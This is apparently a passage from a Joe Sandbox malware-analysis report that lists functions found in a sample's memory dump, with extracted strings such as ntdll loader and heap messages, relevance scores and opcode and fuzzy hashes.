                                                              • Opcode Fuzzy Hash: cc8b71a0c4cddb300db310a7265973f286ca2cb283408bdedc2ac5528527c3fe
                                                              • Instruction Fuzzy Hash: 8C41B037A042519BCB21CF6CF841A26BFE9BF49A98F060569ED98E7B11D731D800CB91
                                                              Function 01360BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                              • API String ID: 0-2558761708
                                                              • Opcode ID: f74b2dd9c00418598c4b379c9d46844ef2432fbe98e0305bc29917413e001037
                                                              • Instruction ID: b3ca139757fc109a40d09d7d46799f4a542110cdb677d86e07b09fa291b7460f
                                                              • Opcode Fuzzy Hash: f74b2dd9c00418598c4b379c9d46844ef2432fbe98e0305bc29917413e001037
                                                              • Instruction Fuzzy Hash: E011E131315106DFDB2DDB28C482BB6B3A8EF4061EF18C129F506DBA99EB38E840C750
                                                              Function 013D20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • Process initialization failed with status 0x%08lx, xrefs: 013D20F3
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 013D2104
                                                              • LdrpInitializationFailure, xrefs: 013D20FA
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-2986994758
                                                              • Opcode ID: b83400f5fdbdb4fbc455fd6c9ee8bded240389ad3034088a1fd0fab2f7cea25f
                                                              • Instruction ID: 429c891cd8a5780d0ea83333166f392c2ee5d7721ce2ac5993c2b8305f6c8dff
                                                              • Opcode Fuzzy Hash: b83400f5fdbdb4fbc455fd6c9ee8bded240389ad3034088a1fd0fab2f7cea25f
                                                              • Instruction Fuzzy Hash: C2F0C879640318AFE724EB5DDC42F963B68EB40F5CF104059FA407B281D5B0A904C695
                                                              Function 013603E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: #%u
                                                              • API String ID: 48624451-232158463
                                                              • Opcode ID: 91e8a71516400e247dfcfbcda5c47d1dbcd932331482626b8ba7b6c3ac3b3da5
                                                              • Instruction ID: bd6f70c7780f555dd50b843694e475076ddfdb4592658b382d05b292d4c9621e
                                                              • Opcode Fuzzy Hash: 91e8a71516400e247dfcfbcda5c47d1dbcd932331482626b8ba7b6c3ac3b3da5
                                                              • Instruction Fuzzy Hash: 93716A71A0010A9FDF05DFA8C990BAEB7F8FF18708F144065EA05A7256EA34ED01CB64
                                                              Function 0135A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • LdrResSearchResource Exit, xrefs: 0135AA25
                                                              • LdrResSearchResource Enter, xrefs: 0135AA13
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                              • API String ID: 0-4066393604
                                                              • Opcode ID: b9ea99fb532cab31668660a4313b222e8c29a7a2f57df3169cda23b0cde28d42
                                                              • Instruction ID: 59be039f12651de54c0c843b9ba1b72bd492ec710cef834e334eefcff565eb10
                                                              • Opcode Fuzzy Hash: b9ea99fb532cab31668660a4313b222e8c29a7a2f57df3169cda23b0cde28d42
                                                              • Instruction Fuzzy Hash: 14E17171E00219ABEF62CE9DC980FEEBBB9BF44718F144626EE01E7651E7349940DB50
                                                              Function 0141A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: `$`
                                                              • API String ID: 0-197956300
                                                              • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                              • Instruction ID: 23fff3db130d2d4f91d33ab8c3e291e06f2c5a15538e69929bfd501a1bc3c616
                                                              • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                              • Instruction Fuzzy Hash: CFC1F5312053829BE725CF29C840B6BBBE5BFD4318F284A2EF699C72A8D774D505CB41
                                                              Function 013CE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID: Legacy$UEFI
                                                              • API String ID: 2994545307-634100481
                                                              • Opcode ID: cdd9a5a1836f68a495be1446f1460b91865b1778a9a1fe5b34b5651723d166b3
                                                              • Instruction ID: 9bcc6ddb90b4463ffcd7eceb7f5e2194632f8c7794aabb24bce8c6c463a599e3
                                                              • Opcode Fuzzy Hash: cdd9a5a1836f68a495be1446f1460b91865b1778a9a1fe5b34b5651723d166b3
                                                              • Instruction Fuzzy Hash: C2611972E007199FDB15DFA88940AAEBFB9FB48B08F14407DE659EB251D731AD40CB50
                                                              Function 013F43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$MUI
                                                              • API String ID: 0-17815947
                                                              • Opcode ID: 582e0810a0dc90d065a1a336828aa443256798aaefd853f2a72f31c608a5d1b3
                                                              • Instruction ID: af05141d47bbb131dbe25929241fc2768d5a50e45543954d7a7837d6f7a2b3b2
                                                              • Opcode Fuzzy Hash: 582e0810a0dc90d065a1a336828aa443256798aaefd853f2a72f31c608a5d1b3
                                                              • Instruction Fuzzy Hash: A751F771E0161DAEDF11DFA9CC84EEFBBBDEB44758F100529EA15B7290D6309A05CBA0
                                                              Function 013504E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • kLsE, xrefs: 01350540
                                                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0135063D
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                              • API String ID: 0-2547482624
                                                              • Opcode ID: 70153d57de478dba8726e3b1318b591d192850011dd400c40ea4d6143e1f4fe9
                                                              • Instruction ID: c894a102c96acc725987bbcdd9962d6a2d42dd35cb673c2b2c67d26d68a7836e
                                                              • Opcode Fuzzy Hash: 70153d57de478dba8726e3b1318b591d192850011dd400c40ea4d6143e1f4fe9
                                                              • Instruction Fuzzy Hash: 6951B0715047428FD768DF68C580AA7BBE4EF84B18F10483EFAEA87241E772D545CBA1
                                                              Function 0135A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • RtlpResUltimateFallbackInfo Exit, xrefs: 0135A309
                                                              • RtlpResUltimateFallbackInfo Enter, xrefs: 0135A2FB
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                              • API String ID: 0-2876891731
                                                              • Opcode ID: 45dbf201d60f0a1ecbd206ee1495ec73920fadfde8ebf4e5866e5dda63d264ea
                                                              • Instruction ID: 8b209eab2b491fb316fae7135a9b271300656ae62719c3490b76803c526a8ff1
                                                              • Opcode Fuzzy Hash: 45dbf201d60f0a1ecbd206ee1495ec73920fadfde8ebf4e5866e5dda63d264ea
                                                              • Instruction Fuzzy Hash: A141BC31A04649DBDB15DF59C880FAA7BB8FF84B0CF1442A5EE04DB692E6B5D900CB50
                                                              Function 0138A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID: Cleanup Group$Threadpool!
                                                              • API String ID: 2994545307-4008356553
                                                              • Opcode ID: 22eae8dde3b6c8de6ea540170c5dbbfb3243b4f5fa77b047279eb066ecc3bb4c
                                                              • Instruction ID: 3698edbd5994ae251d7d2f6a70869bd340137887eab39dfb9afb54b33c23e6f4
                                                              • Opcode Fuzzy Hash: 22eae8dde3b6c8de6ea540170c5dbbfb3243b4f5fa77b047279eb066ecc3bb4c
                                                              • Instruction Fuzzy Hash: 6F01D1B2251704AFD311EF14CD46B2677E8E78572DF01893AE658C7194E334D904CB4A
                                                              Function 0135C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: MUI
                                                              • API String ID: 0-1339004836
                                                              • Opcode ID: 8de56e7bcecc78cde520053ce5f3aef783eabd8ada9888d0d60d78aa9265096d
                                                              • Instruction ID: 9910eb8496ce67e4d5afcc7d2bcc44e774d5fde7a078135378e46f3c33474a05
                                                              • Opcode Fuzzy Hash: 8de56e7bcecc78cde520053ce5f3aef783eabd8ada9888d0d60d78aa9265096d
                                                              • Instruction Fuzzy Hash: 74825C75E003198BEB65CFA9C880BEDBBB9BF48B18F148169DD19AB351D7309D81CB50
                                                              Function 013D6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID: 0-3916222277
                                                              • Opcode ID: 757e33443a2a3f561a88aff021a3fed90cefa96d170d698bc7d99a5c96b45b03
                                                              • Instruction ID: d2742f80ebf4a8dc9407ae4333dcda9c6c93bfa31c0dda0ce2bcf22be8833c22
                                                              • Opcode Fuzzy Hash: 757e33443a2a3f561a88aff021a3fed90cefa96d170d698bc7d99a5c96b45b03
                                                              • Instruction Fuzzy Hash: 4C9195B2A00219AFEB21DF99DC85FAEBBB9EF14754F104065F610BB194D774AD04CBA0
                                                              Function 013FE10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID: 0-3916222277
                                                              • Opcode ID: 21049c8bc84d205ccdb77ca27ca0edd6fa2bb42046e47c6cd250f0fd439f6089
                                                              • Instruction ID: 46e09681b543d04da333af35c066c03ed7e9601bb85ec1b0a58d06a8e34e74f3
                                                              • Opcode Fuzzy Hash: 21049c8bc84d205ccdb77ca27ca0edd6fa2bb42046e47c6cd250f0fd439f6089
                                                              • Instruction Fuzzy Hash: C191A136900609BFDF22ABA9DD44FAFBBBDEF45748F11002AF605A7260E7749901CB51
                                                              Function 0138A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: GlobalTags
                                                              • API String ID: 0-1106856819
                                                              • Opcode ID: 8a4b00ca6a02b7cf25751edca7fa6d34e658180a5ec58a5edd4e1218637cbe1c
                                                              • Instruction ID: 45923e1f9480614c53f4aec6ad8cd1d05953a6b7a58863861812393dd9374581
                                                              • Opcode Fuzzy Hash: 8a4b00ca6a02b7cf25751edca7fa6d34e658180a5ec58a5edd4e1218637cbe1c
                                                              • Instruction Fuzzy Hash: 8E715BB5E0030A9BDF28DF9CC5916AEBBB1BF88B18F14852EE905A7345E7359C41CB50
                                                              Function 013F4978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .mui
                                                              • API String ID: 0-1199573805
                                                              • Opcode ID: 3a731da6a57307980f76fd3e0b6ddd287f6b55cc9447a618b0510d96e20ca21d
                                                              • Instruction ID: 31b504b8a7c77f01c17cea95eb64fc11cfee4738f714108e6814d21f6a88bb29
                                                              • Opcode Fuzzy Hash: 3a731da6a57307980f76fd3e0b6ddd287f6b55cc9447a618b0510d96e20ca21d
                                                              • Instruction Fuzzy Hash: CC519172D0022A9BDF10DF9DD840AAFBBB8AF44A58F05412DEA15BB350D7349D05CFA4
                                                              Function 0136E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: EXT-
                                                              • API String ID: 0-1948896318
                                                              • Opcode ID: 9b0bdcd69e622b36a37f0ec6206bf51ffa2f5f3f2c42619117e10556a81f058f
                                                              • Instruction ID: 17aa967d950ca0f4e37c2f596a11f9e8f41c6449dd140d608e16cd9c75adf95e
                                                              • Opcode Fuzzy Hash: 9b0bdcd69e622b36a37f0ec6206bf51ffa2f5f3f2c42619117e10556a81f058f
                                                              • Instruction Fuzzy Hash: BC41A3765183129BD720DA79C844B6BBBECAF8871CF04893DF684D7184E678DA08C796
                                                              Function 013CC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: BinaryHash
                                                              • API String ID: 0-2202222882
                                                              • Opcode ID: c63062b123641a39902a7efeaa8b42363fe26d9c2e4f67d4838f1d36c76a36f4
                                                              • Instruction ID: b6a240fb65bf1064da2aa0d3896b2c82e70c4c01b53dea0f1d1c567cffc5b717
                                                              • Opcode Fuzzy Hash: c63062b123641a39902a7efeaa8b42363fe26d9c2e4f67d4838f1d36c76a36f4
                                                              • Instruction Fuzzy Hash: AB4124B1D0162DAADF21DA54CC84FDFB77CAB45718F0045A9AA0CAB140DB709E498FA4
                                                              Function 013E6B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: #
                                                              • API String ID: 0-1885708031
                                                              • Opcode ID: 890b592b61545b3bc05bc6cdb758ce5e9ced5b5e8a610869f699f96f4cff7f18
                                                              • Instruction ID: 1867c7338c10ae17763f9a4f4b26dabc2c8be5191978781de274b2a6af6ab6fa
                                                              • Opcode Fuzzy Hash: 890b592b61545b3bc05bc6cdb758ce5e9ced5b5e8a610869f699f96f4cff7f18
                                                              • Instruction Fuzzy Hash: E2314A71A007299BEF22CB6DC859BEE7BE8DF6530CF104068E941AB2C2D775E815CB50
                                                              Function 013CCA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: BinaryName
                                                              • API String ID: 0-215506332
                                                              • Opcode ID: 1940701c672b588136dbd05b35c0511b03bf872c2d83e164f643b24355e45759
                                                              • Instruction ID: cb9abcad9b83d633aa4fe8b757242e02f480096803f0be0697885b0d339da2f4
                                                              • Opcode Fuzzy Hash: 1940701c672b588136dbd05b35c0511b03bf872c2d83e164f643b24355e45759
                                                              • Instruction Fuzzy Hash: 35312736900519AFEB15DB9CC845E6FBB78EF80B18F01416DE909A7250D730AE04E7E0
                                                              Function 013D892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 013D895E
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                              • API String ID: 0-702105204
                                                              • Opcode ID: 68d8d9ed6474000e132ddea1956145d20035b27ef588b90d24eb96f1b5d5ad49
                                                              • Instruction ID: 35e52dcbc068908490bbe3f09d2d076b611e598fa2b6174c1401e5c82bf330aa
                                                              • Opcode Fuzzy Hash: 68d8d9ed6474000e132ddea1956145d20035b27ef588b90d24eb96f1b5d5ad49
                                                              • Instruction Fuzzy Hash: A401F737200201ABEB206F59F884E5A7B65FF8565CB04046DF68116562CB30B841CB92
                                                              Function 013F2000 Relevance: .8, Instructions: 757COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b57c8bfd74560312363bce54d8815db3b172b3f66938efa4e13106154882a97b
                                                              • Instruction ID: 167608ac8cc13abbe687d0fb63d511ec492317eb8a18429a84107ef05f91803d
                                                              • Opcode Fuzzy Hash: b57c8bfd74560312363bce54d8815db3b172b3f66938efa4e13106154882a97b
                                                              • Instruction Fuzzy Hash: DA42D276608341DFEB25CF68C890A6BBBE5BF88308F48492DFB8697250D771D845CB52
                                                              Function 013E8158 Relevance: .6, Instructions: 617COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1477268e7c8bb34ca4b43d17f1dee713b2003299596d64e864a46749a44f4ff9
                                                              • Instruction ID: f96f581ec3fdc0678978ecbcbb9f436f1713e0eb0c985344808ce5988c7e8208
                                                              • Opcode Fuzzy Hash: 1477268e7c8bb34ca4b43d17f1dee713b2003299596d64e864a46749a44f4ff9
                                                              • Instruction Fuzzy Hash: CB424975E003298FEB25CF69C885BADBBF5BF48314F1480D9E949AB282D7349985CF50
                                                              Function 01362840 Relevance: .6, Instructions: 605COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e5cb11c892856ea6cfdb5fc26f76df8d7468a96bcd43dcf8c11141d130f02ba4
                                                              • Instruction ID: d5dd5b80df4e7e479111b9e9a468156bcae3a65fb04a9c44110cec4091a04465
                                                              • Opcode Fuzzy Hash: e5cb11c892856ea6cfdb5fc26f76df8d7468a96bcd43dcf8c11141d130f02ba4
                                                              • Instruction Fuzzy Hash: B732E2B0A007598FDB25CF69C8857FEBBF6BF84308F14811DD6469BA86E735A811CB50
                                                              Function 013FA118 Relevance: .6, Instructions: 591COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e7283663678d7241f73ec5e4501c06befee6558b53d8602429f39e587d170653
                                                              • Instruction ID: fc6ab360043b07fe8bcfba83c6526d1a44babf541cc38d0730d6ca2917e62c38
                                                              • Opcode Fuzzy Hash: e7283663678d7241f73ec5e4501c06befee6558b53d8602429f39e587d170653
                                                              • Instruction Fuzzy Hash: F522CD742046658BEB25CF2DC094772BBF1AF44348F08849EEB8E8F686D735E456DB60
                                                              Function 01356A50 Relevance: .5, Instructions: 548COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 65ac232f99eca4b4e44dcd792c7ec8287196c6d915757f0401ea9fbfc333d736
                                                              • Instruction ID: d06b1a0fd0afde0dcb3786e97bc6a953dda065d3b5bb5e5b5359ad04c373c231
                                                              • Opcode Fuzzy Hash: 65ac232f99eca4b4e44dcd792c7ec8287196c6d915757f0401ea9fbfc333d736
                                                              • Instruction Fuzzy Hash: E732F1B0A01209CFDB65CF69C490BAEBBF5FF48308F548569EA4AAB751D734E841CB50
                                                              Function 01374A35 Relevance: .4, Instructions: 423COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                              • Instruction ID: a611f3fd947bc2a5d8ebc0504cf9fc7910c56f48f7e8cb033a07dd7a89f0f3ec
                                                              • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                              • Instruction Fuzzy Hash: 57F17170E0020ADBDF25CF99C580BEEBBF5AF48718F048129EA45AB655E778EC41CB50
                                                              Function 013E892B Relevance: .4, Instructions: 386COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 96d0b67f913593028124276b1ea2ee66922d8eb08c7cff62f130d5d386d8cc29
                                                              • Instruction ID: 92d54bf746f3f554f1e4144da6e228c846e92e73f10a6a4bddb95b66de99bffd
                                                              • Opcode Fuzzy Hash: 96d0b67f913593028124276b1ea2ee66922d8eb08c7cff62f130d5d386d8cc29
                                                              • Instruction Fuzzy Hash: BCD1E171E0072A8BEF15CF6CC845AFEB7F5AF88308F1881A9D955A7281D735E9058B60
                                                              Function 013565D0 Relevance: .4, Instructions: 383COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1911c0025cae46f1f391afac7f06619827fd9dbcdaac3bf7e2c090d1a4c83654
                                                              • Instruction ID: d29c7e1c14f7827850619ddb80bb2b972f08b6619e38f6a9af55d1ed3d05b366
                                                              • Opcode Fuzzy Hash: 1911c0025cae46f1f391afac7f06619827fd9dbcdaac3bf7e2c090d1a4c83654
                                                              • Instruction Fuzzy Hash: 3BE19EB1608342CFC755CF28C090A6ABBF4FF89718F45896DE99987351EB31E905CB92
                                                              Function 01348397 Relevance: .4, Instructions: 380COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3574bcd9e6e3842c7468327c047f18b297f6a3fc9a2e793a30301c3b38281094
                                                              • Instruction ID: 65d5f3e6e5aac9e26239dc46179aeb34eef34f50461717c1bc86c3d2b00791ba
                                                              • Opcode Fuzzy Hash: 3574bcd9e6e3842c7468327c047f18b297f6a3fc9a2e793a30301c3b38281094
                                                              • Instruction Fuzzy Hash: 73D11671A0020ACBDB14DFA8C890ABABBF5FF5431CF04866DE915DB291E734E951CB50
                                                              Function 013D8243 Relevance: .3, Instructions: 322COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
